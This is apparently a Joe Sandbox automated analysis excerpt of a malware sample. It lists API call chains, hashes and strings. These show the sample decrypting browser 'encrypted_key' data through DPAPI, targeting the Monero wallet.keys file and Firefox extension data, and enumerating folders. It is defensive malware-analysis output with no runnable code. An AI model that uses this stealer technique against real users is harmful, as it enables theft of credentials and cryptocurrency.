                            • Opcode Fuzzy Hash: 20b91a355335323de837805b182a09dd93ca7d39883b69d326be12743b7b3209
                            • Instruction Fuzzy Hash: F681FE7291010C9BCB18FBA4DE96FEE7378AF54304F54513DF416B6091EE366A0ACB62
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00ED1580,00ED0D92), ref: 00EBF54C
                            • lstrlen.KERNEL32(00000000), ref: 00EBF56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 19e601fcfdef60b3ac1f9f2a9f6a3d6ade9c428eca4e7b61c825b2d7c69865d7
                            • Instruction ID: df3aae8769e6717156f3c8712383bd994a18d22b8a443a5b91ca856977165883
                            • Opcode Fuzzy Hash: 19e601fcfdef60b3ac1f9f2a9f6a3d6ade9c428eca4e7b61c825b2d7c69865d7
                            • Instruction Fuzzy Hash: 0B510372D0010CABDB18FBA0ED56EED73B8AF54304F44953DF41676191EE355A0ACBA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-3520659465
                            • Opcode ID: 61f9a6a32a3b74d9ac91cc72bfdb482881d0dc8de68183da179d6f2292b2976d
                            • Instruction ID: c55b79a8f14397d86a2f84bed201ae81871d89596b8d5fe725cc811fe794c377
                            • Opcode Fuzzy Hash: 61f9a6a32a3b74d9ac91cc72bfdb482881d0dc8de68183da179d6f2292b2976d
                            • Instruction Fuzzy Hash: 6E51BFB0C042089BDB24EB90DE85FEEB3B4AF04304F1460ACE25577281EB752E8ACF54
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 343d18089b6264ce9cf40459a123e37676bd5708ed49f355b06277ec22caea28
                            • Instruction ID: 5b007e817de700df507b8acca1afccd4d9eb2aa3f5e8cc7fe5a84adba099b2b1
                            • Opcode Fuzzy Hash: 343d18089b6264ce9cf40459a123e37676bd5708ed49f355b06277ec22caea28
                            • Instruction Fuzzy Hash: C8411E71D10209ABCB04EFB5DA45FFEB7B4AB44708F14A02DE41676290DB769A06CFA1
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EB9D39
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9AEF
                              • Part of subcall function 00EB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B01
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9B2A
                              • Part of subcall function 00EB9AC0: LocalFree.KERNEL32(?,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B3F
                              • Part of subcall function 00EB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EB9B84
                              • Part of subcall function 00EB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EB9BA3
                              • Part of subcall function 00EB9B60: LocalFree.KERNEL32(?), ref: 00EB9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 99465dc45be4e04798fde74b7e5b3ce049e804e4631a00fedf7eaf606fe86781
                            • Instruction ID: 5468274f642a6996f031b3201410887dc418935a6a7ba2ab91653c9e59087428
                            • Opcode Fuzzy Hash: 99465dc45be4e04798fde74b7e5b3ce049e804e4631a00fedf7eaf606fe86781
                            • Instruction Fuzzy Hash: A7315EB6D10209ABCF04DBE4DD85EEFB7B8BB48304F145519EA05B7242EB319A05CBA1
                            APIs
                            • __getptd.LIBCMT ref: 00ECC74E
                              • Part of subcall function 00ECBF9F: __amsg_exit.LIBCMT ref: 00ECBFAF
                            • __getptd.LIBCMT ref: 00ECC765
                            • __amsg_exit.LIBCMT ref: 00ECC773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00ECC797
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: b6351704e5c68927a3f0c5a1451de9343ab1133239ec16d11d4a41358f6f434b
                            • Instruction ID: 5c026952bab839f5e9dd013f0d8615265bdbdd384593b1cf58072a3234462aeb
                            • Opcode Fuzzy Hash: b6351704e5c68927a3f0c5a1451de9343ab1133239ec16d11d4a41358f6f434b
                            • Instruction Fuzzy Hash: 63F06D32A053049BDB21BBB85A07F5E33E0AF00724F25614EF418B62D2DB6659439E56
                            APIs
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4F7A
                            • lstrcat.KERNEL32(?,00ED1070), ref: 00EC4F97
                            • lstrcat.KERNEL32(?,00A98808), ref: 00EC4FAB
                            • lstrcat.KERNEL32(?,00ED1074), ref: 00EC4FBD
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC492C
                              • Part of subcall function 00EC4910: FindFirstFileA.KERNEL32(?,?), ref: 00EC4943
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FDC), ref: 00EC4971
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FE0), ref: 00EC4987
                              • Part of subcall function 00EC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EC4B7D
                              • Part of subcall function 00EC4910: FindClose.KERNEL32(000000FF), ref: 00EC4B92
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 7163109b1635a98c69ae2f56feafbf7652e5e9011ea5f9c5a14e0fa58a80b49a
                            • Instruction ID: 4361c7675892c13b2ae5d96479205c0529b918bac6c193e06bda2776263f6de8
                            • Opcode Fuzzy Hash: 7163109b1635a98c69ae2f56feafbf7652e5e9011ea5f9c5a14e0fa58a80b49a
                            • Instruction Fuzzy Hash: 4621FD76A00208A7C764F770DD47FE9337CA794700F00459CB68DA7585DE7696CACBA1